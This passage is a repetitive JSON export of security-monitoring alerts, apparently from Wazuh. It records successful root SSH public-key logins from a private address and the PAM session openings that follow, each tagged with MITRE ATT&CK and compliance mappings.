opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} 